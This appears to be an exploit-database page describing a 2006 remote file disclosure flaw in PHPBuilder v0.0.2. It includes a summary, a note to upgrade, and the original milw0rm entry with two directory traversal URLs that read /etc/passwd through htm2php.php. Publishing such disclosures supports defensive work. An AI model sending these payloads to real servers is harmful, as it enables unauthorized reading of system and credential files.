header-logo
Suggest Exploit
vendor:
PHPBuilder
by:
the master
7,5
CVSS
HIGH
Remote File Disclosure
22
CWE
Product Name: PHPBuilder
Affected Version From: 0.0.2
Affected Version To: 0.0.2
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

PHPBuilder v0.0.2 Remote File Disclosure Vulnerability

A vulnerability in PHPBuilder v0.0.2 allows an attacker to read arbitrary files on the server by sending a specially crafted HTTP request. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'filename' parameter of the 'htm2php.php' script. An attacker can exploit this vulnerability by sending a malicious HTTP request containing directory traversal sequences (e.g. '../../../../../etc/passwd') to the vulnerable script. Successful exploitation will result in the disclosure of sensitive information.

Mitigation:

Upgrade to the latest version of PHPBuilder.
Source

Exploit-DB raw data:

########################################################################
#  PHPBuilder v0.0.2  Remote File Disclosure Vulnerability
#
#  Download: http://sourceforge.net/project/downloading.php?groupname=phpbuilder&filename=phpbuilder-0.0.2.tgz&use_mirror=switch
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/lib/htm2php.php?filename=../../../../../etc/passwd
#  http://[Target]/[Path]/sitetools/htm2php.php?filename=../../../../../etc/passwd
#
#  Greetz: str0ke , Dr Max Virus , Kacper
########################################################################

# milw0rm.com [2006-12-21]

Navigation

Suggest Exploit

Services By CQR